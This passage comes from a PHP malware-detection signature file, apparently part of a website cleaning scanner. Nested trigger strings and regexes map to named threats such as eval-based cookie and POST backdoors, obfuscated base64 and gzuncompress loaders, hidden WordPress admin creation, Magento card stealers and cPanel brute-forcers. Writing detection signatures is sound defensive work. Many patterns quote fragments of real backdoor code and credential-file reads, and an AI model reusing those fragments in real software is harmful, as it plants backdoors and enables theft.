		'\s{200}[^;]+(\$\w+)\s*=\s*\$GLOBALS\[.[_COKIE\'\"\s\.]+\]' => array(REX_CLEAR_MULTIMATCH, 'rex.function_GLOBAL_COOKIE.001', '\s{200}[^;]+(\$\w+)\s*=\s*\$GLOBALS\[.[_COKIE\'\"\s\.]+\];\s*if[^\{]+(empty|isset)\(\1\[[^;]+(\$\w+)\s*=\s*\1[^\}]+(\$\w+)\s*=\s*\1[^\}]+\4\(\3\(\1[^;]+;\s*\}'),
		'\], true, 404\);\s*print (?:\$\w+\[\d+\]\.)+\$\w+\[\d+\];\s*\}' => array(REX_CLEAR_MULTIMATCH, 'rex.404_or_redirect.001', '<\?php\s*\$\w+.+?for\(.+true, 404[^>]+\?>'),
		'$GLOBALS[\'module\'][\'' => array(STR_CLEARFILE, 'php.backdoor.b374k-shell.016.04', NULL),
	),

	'\x' => array(STR_TRIGGER,

		'$GLOBALS["\x61\156\x75\156\x61"]' => array(STR_TRIGGER,
			'if(!isset($GLOBALS["\x61\156\x75\156\x61"]))' => array(STR_CLEAR_LINEMATCH, 'php.malware.anuna.001.03', 'if..isset.\$GLOBALS...x61.156.x75.156.x61[^>]+\$GLOBALS...x61.156.x75.156.x61..=1;[^\}]+\}'),
			'foreach(explode("\x7c"' => array(STR_CLEAR_LINEMATCH, 'php.malware.anuna.003', 'foreach\(explode\(..x\w\w.,..x[^\)\s]+\) as[^\}\?]+\[..x61.156.x75.156.x61.\]=\w; \}'),
		),

		']=Array();global' => array(STR_TRIGGER,
			'],);echo@$' => array(STR_CLEAR_MULTIMATCH, 'php.malware.GLOBALS.003', '\$[\w]+[\s]*=[\s]*[\d]+;[\s]*\$GLOBALS\[.[\w]+.\]=Array\(\);global\$[\w]+;[\s]*\$[\w]+=\$GLOBALS;\$\{".x47.x4c.x4fB.x41.x4c.x53"\}\[.[\w]+.\]=".x[^%]+\}exit\(\);}(?:if..isset.\$\w+\[\$\w+\[[^\)]+\)\)\{echo[^;\}]+;\}+)?'), //PG;varinats
		),

		'\$GLOBALS;\${.(?:.x47|G)(?:.x4c|L)(?:.x4f|O)(?:.x47|B)' => array(REX_CLEAR_MULTIMATCH, 'php.malware.GLOBALS.007', '\$[\w]+[\s]*=[\s]*[\d]+;[\s]*\$GLOBALS\[.[\w]+.\][\s]*=[\s]*Array\(\);[\s]*global[\s]*\$[\w]+;[\s]*\$[\w]+[\s]*=[\s]*\$GLOBALS;[^\?]+exit\(\);[\s\}]+'), //modified by PG - 11/18
		'\x65\166\x61\154\x28\163\x74\162\x5f' => array(STR_CLEAR_LINEMATCH, 'php.malware.anuna.002', '\$\w+\s*=\s*\'.{1000,} = explode\(chr\(\(.*x65.166.x61.154.x28.163.x74[^>]+\$\w+=\$\w+-1;'),
	),

	'function_exists' => array(STR_TRIGGER,
		'explode(chr' => array(STR_TRIGGER,
			')),substr($' => array(STR_TRIGGER, 
				')]); $' => array(STR_TRIGGER, 
					')]); if (!function_exists(\'' => array(STR_CLEAR_LINEMATCH,'php.malware.anuna.001', '\$[\w]+[\s]*=[\s]*\'[^\']{3000,}\';[\s]*\$[\w]+[\s]*=[\s]*explode.chr\(\([\d]+-[\d]+\)\),substr..[\w]+,\([\d]+-[\d]+\),\([\d]+-[\d]+\)\)\);[^{]+; if \(!function_exists[^=]+= NULL[^>]+\$[\w]+[\s]*=[\s]*\$[\w]+-1;'),
				),
			),
		),
	),

	'if (empty(${' => array(STR_TRIGGER,
		'")}(${' => array(STR_TRIGGER,
			').chr(' => array(STR_TRIGGER,
				')]), chr(ord("' => array(STR_CLEARFILE, 'php.malware.obfuscated.010', NULL),
			),
		),
	),

	'__FILE__' => array(STR_TRIGGER,
		'Author URI: http://www.wordpress.com' => array(STR_TRIGGER,
			'(\'\',\'global $O' => array(STR_CLEARFILE, 'php.spam-seo.fake_wp_support.001', NULL),
		),
	),

	'sprintf($' => array(STR_TRIGGER,
		']]);}exit();} ?>' => array(STR_CLEAR_LINEMATCH, 'php.malware.GLOBALS.001', '((\$[\w]+[\s]*=[\s]*\d+;)|(\$GLOBALS\[.[\w]+.\]=Array\(\);)|\$GLOBALS\[.[\w]+.\];)+global[\s]*\$[\w]+;[\s]*\$[\w]+=\$GLOBALS;\$[^\?]+\]\]\);}exit\(\);}'),
	),

	'print <<< EOF' => array(STR_TRIGGER,
		'<script>window.location = "' => array(STR_CLEARFILE, 'php.spam-seo.redirect.040', NULL),
	),

	'. DIRECTORY_SEPARATOR . $' => array(STR_TRIGGER,
		')>5000) { break; }' => array(STR_CLEARFILE, 'php.spam-seo.doorway-gen.022', NULL),
	),

	'<? $GLOBALS[\'_' => array(STR_TRIGGER,
		'$host/$id");break;default:$doheader' => array(STR_CLEARFILE, 'php.malware.GLOBALS.002', NULL),
	),

	'<?php $GLOBALS[\'_' => array(STR_TRIGGER,
		'frmtmp.php"); ?>' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.frmtmp_uploader.001', '<.php \$GLOBALS\[\'_\d+_\'\]=Array[^\?]+?\)\); \?><\? function _\d+\([^\?]+;\} \?><\?php \@\$GLOBALS\[.+?\}frmtmp.php"\); \?>'),
	),

	');}}}$GLOBALS[' => array(STR_TRIGGER,
		')))<round(0+0.5+0.5)){$GLOBALS[' => array(STR_CLEARFILE, 'php.malware.GLOBALS.005', NULL),
	),

	'GLOBAL $alreadyxxx;' => array(STR_CLEARFILE, 'php.backdoor.eval_POST.011', NULL),
	'array_filter ($GLOBALS,' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.array_filter.003', 'if\s*\(\!function_exists\([\'"](\w+)[\'"]\)\)\s*:\s*(?:\/[^\/]+\/\s*)?function\s*\1\s*\((\$\w+)\)\s*{\s*(\$\w+)\s*=\s*[\'"][^;]+;\s*if\s*\(is_array\(\2\)\)\s*foreach\s*\(\2\s*as\s*(\$\w+)\s*\)\s*{\s*if\s*\(is_array\(\4\)\)\s*foreach\s*\(\4\s*as[^{]+{\s*if\s*\(\$\w+=+\$\w+\)\s*{\s*(\$\w+)\s*=\s*\$\w+\s*;\s*(if\s*\(isset\(\4\)\)\s*)?(?:\5\(\4\[.\w+.\]\s*\(\4\[.\w+.\]\)\);|\$\w+=\5\(\4\[.\w+.\]\s*,\s*\4\[.\w+.\]\s*\(\4\[.\w+.\]\)\)\s*;\s*return\s*\$\w+\(\);\s*)?\s*}\s*}\s*}\s*}\s*endif\s*;\s*(?:\n\/\/[\s\w\-]+\n)?array_filter\s*\(\$GLOBALS\s*,\s*[\'"]\1[\'"]\s*\)\s*;(?:\s*\?>\s*;)?'),
),

'isset' => array(STR_TRIGGER,

	'function_exists' => array(STR_TRIGGER,

		'explode(chr' => array(STR_TRIGGER,
			')),substr($' => array(STR_TRIGGER, 
				')]); $' => array(STR_TRIGGER, 
					')]); if (!function_exists(\'' => array(STR_CLEAR_LINEMATCH,'php.malware.anuna.001.02', '\$[\w]+[\s]*=[\s]*\'[^\']{3000,}\';[\s]*\$[\w]+[\s]*=[\s]*explode.chr\(\([\d]+-[\d]+\)\),substr..[\w]+,\([\d]+-[\d]+\),\([\d]+-[\d]+\)\)\);[^{]+; if \(!function_exists[^=]+= NULL[^>]+\$[\w]+[\s]*=[\s]*\$[\w]+-1;'),
				),
			),
		),

		'=(ord($' => array(STR_TRIGGER,
			'=base64_decode($' => array(STR_TRIGGER,
				',"\r\n\r\n")+' => array(STR_CLEARFILE, 'php.backdoor.generic.070', NULL),
			),
		),

		'mcrypt_decrypt' => array(STR_TRIGGER,
			'strrev(\'edoced_46esab\')' => array(STR_TRIGGER,
				'= $wpdb->get_var("SELECT `option_value` FROM {$wpdb->options} WHERE `option_name`=' => array(STR_CLEARFILE, 'php.backdoor.encrypted.004', NULL),
			),
		),

		'$evil=create_function(' => array(STR_TRIGGER,
			'call_user_func($evil,$_POST[' => array(STR_CLEARFILE, 'php.backdoor.evilcmd.001', NULL),
		),

		'strrev(\'etalfnizg\');' => array(STR_TRIGGER,
			'option_name`=\'s_encrypted_data' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.eval_isset.004', 'if\(isset\(\$_GET\[.[\w]+.\]\)[\s]*&&[\s]*!defined\(.[\w]+.\)\)[\s]*\{[\s]*define[^!]+if\(!function_exists\(.[\w]+.\)\)[\s]*\{[\s]*function[^;]+strrev\(.edoced_46esab.\);[\s]*return[\s]*\$[^>]+\$[\w]+[\s]*=[\s]*\$wpdb->get_var\(.SELECT[^;]+encrypted_data..\);[^;]+eval\([\w]+\([\w]+\(\$[\w]+\)\)\);[\s]*\}[\s]*\}'),
		),

		'wp_create_user(' => array(STR_TRIGGER,
			'$user_name . rand(1,10000) . rand(1,10000)' => array(STR_CLEARFILE, 'php.backdoor.fake_plugin.011', NULL),
		),
	),

	']($_' => array(STR_TRIGGER, 

		'@author Jakub Vrana' => array(STR_WHITE, 
			'(\/\*[a-zA-Z0-9]{0,5}\*\/)?if[^i]+isset\(\$_(?:COOKIE|POST|GET)\[[\'"]\w+[\'"]\]\)[^{]+{\$_(?:COOKIE|POST|GET)\[[\'"]\w+[\'"][^\$]+\$_(?:COOKIE|POST|GET)' => array(REX_CLEAR_MULTIMATCH, 'rex.backdoor.eval.001', '(\/\*[a-zA-Z0-9]{0,5}\*\/)?if[^i]+isset\(\$_(?:COOKIE|POST|GET)\[[\'"]\w+[\'"]\]\)[^{]+{\$_(?:COOKIE|POST|GET)\[[\'"]\w+[\'"][^\$]+\$_(?:COOKIE|POST|GET)\[[\'"]\w+[\'"]\]\);(\/\*\w+\*\/)?exit;(\/\*\w+\*\/)?}(\/\*[a-zA-Z0-9]{0,5}\*\/)?'), //Improved by Luke Leal to cover two new variants on Oct 23 2017
		),

		'])){$_COOKIE' => array(STR_TRIGGER,
			'isset[^(]*\([^$]*\$_COOKIE\[[^{]+\{[^$]*\$_COOKIE\[[^]]+\]\(\$_COOKIE' => array(REX_CLEAR_LINEMATCH, 'php.backdoor.eval_COOKIE.015', 'if[^(]+\([^(]*isset[^(]*\([^$]*\$_COOKIE\[[^{]+\{[^$]*\$_COOKIE\[[^]]+\]\(\$_COOKIE[^}]+\}'),
		),

		'){if(!self::$_j):self::_ulerv();endif;return hex2bin(self::$_j[$_' => array(STR_CLEARLINE, 'php.malware.obfuscated.015', 'class\s+\w+\s*\{\s*(?:private\s*)?static\s*\$_j\s*;\s*static\s+function\s+\w+\s*\(\s*\$\w+\s*\){if\(!self::\$_j\):self::_ulerv\(\);endif;return hex2bin\(self::\$_j\[\$_[^;]+?;\s*\}\s*(?:private\s*)?static\s+function[^;]+?;\s*\}\s*\}\s*(?:\$\w+[^;]+?::[^;]+?;\s*|(?:else)?if\s*\([^;]+?;|else[^;]+?;|endif\s*;\s*|die\([^;]+?;|\$\w+\s*=\s*(?:false|true);|foreach[^;]+?;|break;|endforeach;|@\$\w+\[\w+::[^;]+?;|\$\w+\s*=\s*\$_(?:POST|GET|REQUEST|COOKIE);|)+'),
		'] ) && crc32($_COOKIE ['=> array(STR_CLEAR_MULTIMATCH, 'php.malware.COOKIE_check.001', 'if\s*\(\s*isset\(\$_COOKIE\[\s*.(\w+)[^&]+&&\s*crc32\(\$_COOKIE\s*\[[^=]+==\s*.\d+.\s*\)\s*\{\s*\$_COOKIE\[\s*.\1.\s*\]\(\$_COOKIE\[\s*.\w+.\s*\]\);\s*\}'),
		', $_COOKIE[\'session_http\'], NULL); file_put_contents(' => array(STR_CLEARFILE, 'php.backdoor.filesman.120', NULL),
	),

	'if(isset($_GET' => array(STR_TRIGGER,
		'PD9waHAKCiRmaWxlcyA9IEAkX0ZJTEVTWyJ' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.eval_isset.003', 'if\(isset\(\$_GET\[.[\w]+.\]\)&&\$_GET\[[^;]+\;\$[\w]+=\$func\([^;]+;.\);\$[\w]+\(.PD9wa[^;]+==.\);exit;\}'),
		'PD9waHAgJHsiXHg0N1x4NGNceDRmXHg0Mlx4NDFceDRjXHg' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.eval_isset.005', 'if[\s]*\(isset[\s]*\(\$_GET\[.[\w]+.\]\)&&\$_GET\[.[\w]+.\]==.[\w]+.\)[\s]*\{[\s]*\$[\w]+[\s]*=[\s]*[^;]+;[\s]*\$[\w]+[\s]*=[\s]*\$[\w]+\(..\$[\w]+[^;]+\)\);.\);[\s]*\$[\w]+\(.[^;]+\);[\s]*exit;[\s]*\}'),
	),

	'if(isset($_COOKIE["' => array(STR_TRIGGER,
		'if\(isset\(\$_COOKIE\["[^}\n]+exit;}' => array(REX_CLEAR_LINEMATCH, 'rex.backdoor.COOKIE_eval.005.02', 'if\(isset\(\$_COOKIE\[[^\]]+\]\)\)[^\$]+\$_COOKIE\[[^\]]+\][^\$]+\$_COOKIE\[[^\]]+\][^;]+\;[^;]+;}'),
	),

	'= isset($' => array(STR_TRIGGER,
		'="rawurl" . "decode";return $' => array(STR_CLEARFILE, 'php.spam-seo.generic.042', NULL),
	),

	'$rate_code=base64_decode(\'PHNjcmlwdCB0eXBlPSd0ZXh0L2phdmFzY3JpcHQnIHN' => array(STR_CLEAR_MULTIMATCH,'php.spam-seo.injector.121', '\\$filenames=.[^\']+\';[\\s]*if .isset.._COOKIE..url......[\\s]*\\$handless = f[^>]+>[^>]+echo \\$rate_code;[\\s]*}[\\s]*}'),
	'if ( !is_user_logged_in() && get_option(\'ame_ip\')!=$ip && $btt==false) {' => array(STR_CLEAR_MULTIMATCH,'php.spam-seo.injector.106', '\$btt = false;[\s]*if .isset.._SERVER..HTTP_USER_AGENT[^{]++\{[\s]*\$btt = true;[^&]++&& get_option..[\w]+..!=\$ip && \$btt==false[^<]+echo "<script[^;]+script>";[\s]*}'),
	'if (isset($_POST[\'wp-loads\'])) {' => array(STR_CLEARFILE, 'php.backdoor.eval_POST.027', NULL),
	'if (!isset($_POST[\'url\']) && !isset($_POST[\'timeout\'])) {header(\'HTTP/1.1 404 Not Found\');echo' => array(STR_CLEARFILE, 'php.backdoor.eval_POST.029', NULL),
	'if(isset($_POST[\'eval\']))' => array(STR_CLEARFILE, 'php.backdoor.eval_POST.002.002', NULL),
	'if(!empty($_POST[\'tp2\']) and isset($_POST[\'tp2\'])){' => array(STR_CLEARFILE,'php.backdoor.eval_POST.013', NULL),
	'="stop_";$s20=strtoupper' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.eval_POST.024.02', '\$\w+="stop_";\$s20=strtoupper[^>]+(eval|sprintf)[^;]+;\}'),
),

'].$' => array(STR_TRIGGER,

	'\$[\w]+\[[\d]+\]+[\s]*\.[\s]*\$[\w]+\[[\d]+\][\s]*\.[\s]*\$[\w]+\[[\d]+\][\s]*\.' => array(REX_TRIGGER,
		
		'@$' => array(STR_TRIGGER,
			'abcdefghijklmnopqrstuvwxyz(*_;/.)' => array(STR_TRIGGER,
				'@\$[\w]+[\s]*=[\s]*"[^\(]{5,}\\\\x[^\(]+\([^\(]+\\\\x[^\(]+\([^\(]+\\\\x[^\(]+\([^;]{2000}[^;]+;";' => array(REX_CLEARFILE, 'php.backdoor.WSO.007', NULL),
			),
		),

		'((?i)eval(?-i))\(\$' => array(REX_TRIGGER,
			'charCode($' => array(STR_CLEARFILE, 'php.backdoor.webshell.193', NULL),
		),

		'(\$[\w]+)[\s]*=[\s]*\'[^\']{100}[^\']+\';[\s]*\$[\w]+[\s]*=[\s]*(\1\[[\d]+\][\s]*\.[\s]*){50}[^;]+;[\s]*\$[\w]+[\s]*=[\s]*\1\[[^;]+;[\s]*\$[\w]+[\s]*=[\s]*\1\[[^;]+;[^\n]+\$[\w]+\(\$[\w]+\(\$[\w]+\)\);' => array(REX_CLEAR_LINEMATCH, 'php.malware.obfuscated.019', '(\$[\w]+)[\s]*=[\s]*\'[^\']{100}[^\']+\';[\s]*\$[\w]+[\s]*=[\s]*(\1\[[\d]+\][\s]*\.[\s]*){50}[^;]+;[\s]*\$[\w]+[\s]*=[\s]*\1\[[^;]+;[\s]*\$[\w]+[\s]*=[\s]*\1\[[^;]+;[^\n]+\$[\w]+\(\$[\w]+\(\$[\w]+\)\);(\$[\w]+;)?'),
		'\'\';[\s]*\$[\w]+\(\$[\w]+,[\s]*\$[\w]+[\s]*\.[\s]*"[\w]{1000}[^"]+"[\s]*\.[\s]*\$[\w]+[\s]*\.[\s]*\$[\w]+\);' => array(REX_CLEAR_MULTIMATCH, 'php.malware.obfuscated.024', '(\$[\w]+)[\s]*=[\s]*\'[^\$]+\';[\s]*\$[\w]+[\s]*=[\s]*(\$[\w]+\[[\d]+\][\s]*\.[\s]*){5}[^;]+;[\s]*[^\']+\'\';[\s]*\$[\w]+\(\$[\w]+,[\s]*\$[\w]+[\s]*\.[\s]*"[\w]{1000}[^"]+"[\s]*\.[\s]*\$[\w]+[\s]*\.[\s]*\$[\w]+\);'),
		'\$[\w]+[\s]*=["][^"]+";[\s]*\$[\w]+[\s]*=[\s]*\$[\w]+\[[\d]+\][\s]*(\.[\s]*\$[\w]+\[[\d]+\][\s]*){10,}[^\n]+\)\)\);[\s]*\$[\w]+\(\);' => array(REX_CLEAR_LINEMATCH, 'php.malware.obfuscated.034', '\$[\w]+[\s]*=["][^"]+";[\s]*\$[\w]+[\s]*=[\s]*\$[\w]+\[[\d]+\][\s]*(\.[\s]*\$[\w]+\[[\d]+\][\s]*){10,}[^\n]+\)\)\);[\s]*\$[\w]+\(\);'),
		'function[\s]*[\w]+\(\$[\w]+\)[\s]*\{[\s]*GLOBAL[\s]*\$[\w]+,[\s]*\$[\w]+;[\s]*\$[\w]+[\s]*=[\s]*get_option\(.[\w]+.\);[\s]*if\(isset\(\$[\w]+\[.[\w]+.\]\)\)[\s]*\{[\s]*\$[\w]+[\s]*=[\s]*explode\(.#.,[\s]*hex2bin\(\$' => array(REX_CLEAR_LINEMATCH, 'php.malware.obfuscated.048', 'function[\s]*[\w]+\(\$[\w]+\)[\s]*\{[\s]*GLOBAL[\s]*\$[\w]+,[\s]*\$[\w]+;[\s]*\$[\w]+[\s]*=[\s]*get_option\(.[\w]+.\);[\s]*if\(isset\(\$[\w]+\[.[\w]+.\]\)\)[\s]*\{[\s]*\$[\w]+[\s]*=[\s]*explode\(.#.,[\s]*hex2bin\(\$[\w]+\[.[\w]+.\]\)\);[\s]*\$[\w]+[\s]*=[\s]*\$[\w]+\[[\d]+\]\(\);[\s]*if\(\$[\w]+\[[\d]+\]\(\$[\w]+\)\)[\s]*\{\$[^@]+else[\s]*\$[\w]+[\s]*=[\s]*\$[\w]+;[\s]*return[\s]*\$[\w]+;[\s]*\}[\s]*add_filter\(.[\w]+.,.[\w]+.\);'),
		'\$[\w]+[\s]*=[\s]*"[^"]{30,}";[\s]*(\$[\w]+[\s]*=[\s]*\$[\w]+\[[\d]+\][^;]*;[\s]*){3,}@\$[\w]+\(\$[\w]+\([^;]+\);' => array(REX_CLEAR_LINEMATCH, 'php.malware.obfuscated.051', '\$[\w]+[\s]*=[\s]*"[^"]{30,}";[\s]*(\$[\w]+[\s]*=[\s]*\$[\w]+\[[\d]+\][^;]*;[\s]*){3,}@\$[\w]+\(\$[\w]+\([^;]+\);'),
	),

	'(${$' => array(STR_TRIGGER,

		';if(isset(${$' => array(STR_TRIGGER,

			']}[$' => array(STR_TRIGGER,
				'\]\.\$\w+\[\d+\]\.\$\w+\[\d+\]' => array(REX_CLEAR_MULTIMATCH, 'rex.malware.assert.013', '\$[\w]+=\'[^;]+;\$[\w]+=\$[\w]+\[[\d]+\]\.\$[\w]+\[[\d]+\]\.[^>]+if\(isset\(\$\{\$[\w]+\[[\d]+[^>]+;}'),
			),

			']}=curl_exec(${' => array(STR_TRIGGER,
				')){function getUrla($url){if(function_exists(' => array(STR_CLEAR_MULTIMATCH, 'js.malware.redirect.024', '\$\{[^@]+@error_reporting\([\d]+\);if\(!function_exists\([^@]+@\$_SERVER\[[^@]+urlencode\(\@\$_SERVER\[[^@]+\];exit;\}\}if\(\@file_exists\([^\{]+\)\)\{include_once\(.(.[\w]+)+.\);\}'),
			),

		),

		'$xName' => array(STR_TRIGGER,
			'$xPass' => array(STR_CLEARFILE, 'php.hacktool.mailer.115', NULL),
		),
	),

	'(\'\'' => array(STR_TRIGGER,
		
		', join(\'\', $' => array(STR_TRIGGER,
			'="";' => array(STR_TRIGGER,
				'\.\$[\w]{2}\[[\d]+\],[\s]*[\d]+\),[\s]*[\d]+,' => array(REX_CLEARFILE, 'rex.backdoor.assert.014', NULL),
			),
		),

		',array(\'\',\'}\'.$' => array(STR_TRIGGER,
			'.\'//\'));' => array(STR_CLEARFILE, 'php.hacktool.bruteforce.008', NULL),
		),

		'();' => array(STR_TRIGGER,
			'<\?php[\s]*\$[\w]+[\s]*=[\s]*\'[^\']+\';[^\n]+\/\*[^\n]+\*\/\$[^\n]+\/\*[^\n]+\$[\w]+\(\);[^\n]*}?' => array(REX_CLEAR_LINEMATCH, 'php.backdoor.eval_COOKIE.021', '\$[\w]+[\s]*=[\s]*\'[^\']+\';[^\n]+\/\*[^\n]+\*\/\$[^\n]+\/\*[^\n]+\$[\w]+\(\);[^\n]*}?'),
		),

	),

	'die(PHP_OS.$' => array(STR_TRIGGER,
		'@$GLOBALS[' => array(STR_TRIGGER,
			'STREAM_CRYPTO_METHOD_TLS_CLIENT' => array(STR_CLEARFILE, 'php.hacktool.mailer.061', NULL),
		),
	),

	'die[\s]*\([\s]*PHP_OS[\s]*\.[\s]*\$[\w]+\[[\d]+\][\s]*\.[\s]*\$' => array(REX_TRIGGER,
		'FALSE !== @$GLOBALS[' => array(STR_CLEARFILE, 'php.backdoor.generic.076', NULL),
	),

	');}@' => array(STR_TRIGGER,
		'<\?php function [\w]+\(\$\w,\$\w,\$\w.\$\w\)\{\$\w=\$\w[\{\[]\d+[\]\}]\.\$\w[\[\{]\d+[\]\}]\.[^;]+;\$\w=&\$\w;\$\w=&\$\w;\$\w=\$\w[\{\[][\d][^@]+;\}@[\w]+' => array(REX_CLEAR_LINEMATCH, 'php.backdoor.eval_POST.091', '<\?php function [\w]+\(\$\w,\$\w,\$\w.\$\w\)\{\$\w=\$\w[\{\[]\d+[\]\}]\.\$\w[\[\{]\d+[\]\}]\.[^;]+;\$\w=&\$\w;\$\w=&\$\w;\$\w=\$\w[\{\[][\d][^@]+;\}@[\w]+[^;]+\);'),
	),

	'if ($_SERVER["QUERY_STRING"])' => array(STR_TRIGGER,
		'uDMexbrC8aXiXU6ikyoauh5VAVYE3d27YGH71PRfAPd1nl5Y1szyqBhE' => array(STR_CLEARFILE, 'php.backdoor.filesman.117', NULL),
	),

	'\$[\w]+[\s]*=[\s]*"[^"]{300,}";[\s]*\$[\w]+[\s]*=[\s]*\'[^\']{50,}\';[\s]*(\$[\w]+[\s]*=[\s]*\$[\w]+\[[\d]+[^;]+;[\s]*){5,}\$[\w]+[\s]*=[\s]*\$[\w]+\(\'\',[\s]*\$[\w]+\([^,]+,[\s]*\$[\w]+\(\$[\w]+[^;]+\);[\s]*\$[\w]+\(\$[\w]+,[^;]+\);' => array(REX_CLEAR_MULTIMATCH, 'php.backdoor.eval_REQUEST.052', '\$[\w]+[\s]*=[\s]*"[^"]{300,}";[\s]*\$[\w]+[\s]*=[\s]*\'[^\']{50,}\';[\s]*(\$[\w]+[\s]*=[\s]*\$[\w]+\[[\d]+[^;]+;[\s]*){5,}\$[\w]+[\s]*=[\s]*\$[\w]+\(\'\',[\s]*\$[\w]+\([^,]+,[\s]*\$[\w]+\(\$[\w]+[^;]+\);[\s]*\$[\w]+\(\$[\w]+,[^;]+\);'),
	'function __construct() { $module = $this->stack($this->claster);' => array(STR_CLEARFILE, 'php.backdoor.cookie.010', NULL),
	'=\',"\110\52","!' => array(STR_CLEAR_LINEMATCH, 'php.malware.string_rearrangement.001', 'function\s+?([a-zA-Z]{2,4}\d{2,4})\([^@]+?@\1\([^=]+?=+?\',".110.52","![^;]+?;'),
	'(\$\w+)\s*=\s*[\'"][^\=]{24,}[^;]+;\s*(?:(\$\w+)\s*=\s*(?:\1\[\d+\]\.)+\1\[\d+\]\s*;)+(?:\$\w+\s*=\s*\1\[\d+\]\s*;)?(?:\$\w+\s*=\s*(?:\1\[\d+\]\.)+\1\[\d+\]\s*;)+\@?\$\w+\(\$\w+\((?:\$\w+,)?\$\w+\(\2\((?:\1\[\d+\]\.)+\1\[\d+\]\)\)\),\s*\1\[\d+\],\s*\1\[\d+\]\)\s*;' => array(REX_CLEAR_LINEMATCH, 'php.malware.string_rearrangement.002', '(\$\w+)\s*=\s*[\'"][^\=]{24,}[^;]+;\s*(?:(\$\w+)\s*=\s*(?:\1\[\d+\]\.)+\1\[\d+\]\s*;)+(?:\$\w+\s*=\s*\1\[\d+\]\s*;)?(?:\$\w+\s*=\s*(?:\1\[\d+\]\.)+\1\[\d+\]\s*;)+\@?\$\w+\(\$\w+\((?:\$\w+,)?\$\w+\(\2\((?:\1\[\d+\]\.)+\1\[\d+\]\)\)\),\s*\1\[\d+\],\s*\1\[\d+\]\)\s*;'),
	'<\?php[\s]*\/\*[\w]+\*\/[\s]*\?>[\s]*<\?php[\s]*\$[\w]+[\s]*=[\s]*"[^"]+";[\s]*function [\w]+\(\$[\w],[\s]*\$[\w],[\s]*\$[\w]\)[\s]*\{[\s]*return[\s]*[^;]+\'\'[\s]*\.[^;]+;[\s]*\}' => array(REX_CLEARFILE, 'php.backdoor.filesman.112', NULL),
),

'/etc/' => array(STR_TRIGGER,

	'/app/etc/local.xml' => array(STR_TRIGGER,
		'title>MAGENTO - stealing information' => array(STR_CLEARFILE, 'php.hacktool.magento-credential-stealer.002', NULL),
		'echo "<b>CC ORDER PAYMENT' => array(STR_CLEARFILE, 'php.hacktool.magento-data-stealer.001', NULL),
		'Magento Customer Email Dumper' => array(STR_CLEARFILE, 'php.hacktool.magento-data-stealer.002', NULL),
		'Read DB---------[M A G' => array(STR_CLEARFILE, 'php.hacktool.magento-data-stealer.003', NULL),
		'mysql_query("SELECT * FROM `mg_sales_flat_quote_address` WHERE `quote_id` = ".$' => array(STR_CLEARFILE, 'php.malware.magento-cc-stealer.083', NULL),
		'array(\'result\'=>@unlink(__FILE__));' => array(STR_CLEARFILE, 'php.hacktool.magento-data-stealer.006', NULL),
		'<td>password</td>' => array(STR_CLEARFILE, 'php.malware.magento-cc-stealer.128', NULL),
	),

	'posix_getpwuid(' => array(STR_TRIGGER,
		'posix_getpwuid(@fileowner("/etc/valiases/"' => array(STR_CLEARFILE, 'php.exploit.leak.001.002', NULL),
		'scandir("/var/named' => array(STR_CLEARFILE, 'php.exploit.leak.001.003', NULL),
		'echo " | is wordpress (path: $wordpress_path)";' => array(STR_CLEARFILE, 'php.hacktool.wp_attacker.003', NULL),
		'/etc/passwd Bypasser' => array(STR_CLEARFILE, 'php.exploit.sysinfo.008', NULL),
		'dovecot-acl-list";fwrite(fopen($' => array(STR_CLEARFILE, 'php.hacktool.cpanel_user_shadow_editor.004', NULL),
	),

	'etc/trueuserowners' => array(STR_TRIGGER,
		'array_unique($' => array(STR_CLEARFILE, 'php.hacktool.generic.025', NULL),
	),

	'>Automatic cPanel Finder/Cracker' => array(STR_CLEARFILE, 'php.hacktool.cpanel_bruteforce.007', NULL),
	'>Cpanel Cracker' => array(STR_CLEARFILE, 'php.hacktool.cpanel_bruteforce.003', NULL,1),
	'w3tw0rk B0T' => array(STR_CLEARFILE, 'pl.hacktool.w3tw0rk_B0T.001', NULL),
	'unless ($natrix eq "!bot" and $arg =~ /^\!nick' => array(STR_CLEARFILE, 'pl.hacktool.ircbot.005', NULL,1),
	'Script: Cpanel + FTP Cracker' => array(STR_CLEARFILE, 'php.hacktool.cpanel_bruteforce.005', NULL),
	'open (d0mains, \'/etc/named.conf\')' => array(STR_CLEARFILE, 'pl.hacktool.information_gathering.001', NULL),
	'> Server Jumping Finder Version 1.0' => array(STR_CLEARFILE, 'php.hacktool.configuration_stealer.004', NULL),
	'spamtools.be' => array(STR_CLEARFILE, 'php.hacktool.spamtool.012', NULL),
	'"/home/", "/home1/", "/home2/", "/home3/", "/home4/",' => array(STR_CLEARFILE, 'php.hacktool.mail_tester.007', NULL),
),

'gzuncompress' => array(STR_TRIGGER,

	'eval("?>".gzuncompress(base64_decode(' => array(STR_TRIGGER,
		'eval("?>".gzuncompress(base64_decode($lktd)));' => array(STR_CLEARFILE, 'php.backdoor.I-47.002', NULL),
		'eval.....\.gzuncompress.base64_decode[^;]+;' => array(REX_CLEAR_MULTIMATCH, 'php.backdoor.webshell_gen.049', 'eval.....\.gzuncompress.base64_decode[^;]+;'),
	),

	'=str_repeat("\x' => array(STR_TRIGGER,
		'="create_";global $' => array(STR_TRIGGER,
			'.=\'function\')&&!function_exists(' => array(STR_TRIGGER,
				'].\'{\'));};unset($' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.injector.110', '\$[\w]+="create_";global[\s]*\$[\w]+;[\s]*\$[\w]+=array..\$[^{]+=gzuncompress[^\>]+unset.\$[\w]+\);'), //updated by PG to cover other variants
			),
		),
	),

	'repeat_cmd' => array(STR_TRIGGER,
		'sprintf(\'%u' => array(STR_TRIGGER,
			'crc32($_POST[' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.eval_POST.098', 'if[\s]*\([\s]*isset[\s]*\([\s]*\$_COOKIE[\s]*\[.adm.\]\)\)[\s]*\{[\s]*if[\s]*\([\s]*isset[\s]*\([\s]*\$_POST\[.crc.\][\s]*,[\s]*\$_POST\[.cmd.\][^}]+}[\s]*else[\s]*echo[\s]*.repeat_cmd.;[\s}]+(exit\(\);[\s]*})?'),
		),
	),

	'eval(base64_decode(gzuncompress(base64_decode($' => array(STR_TRIGGER,
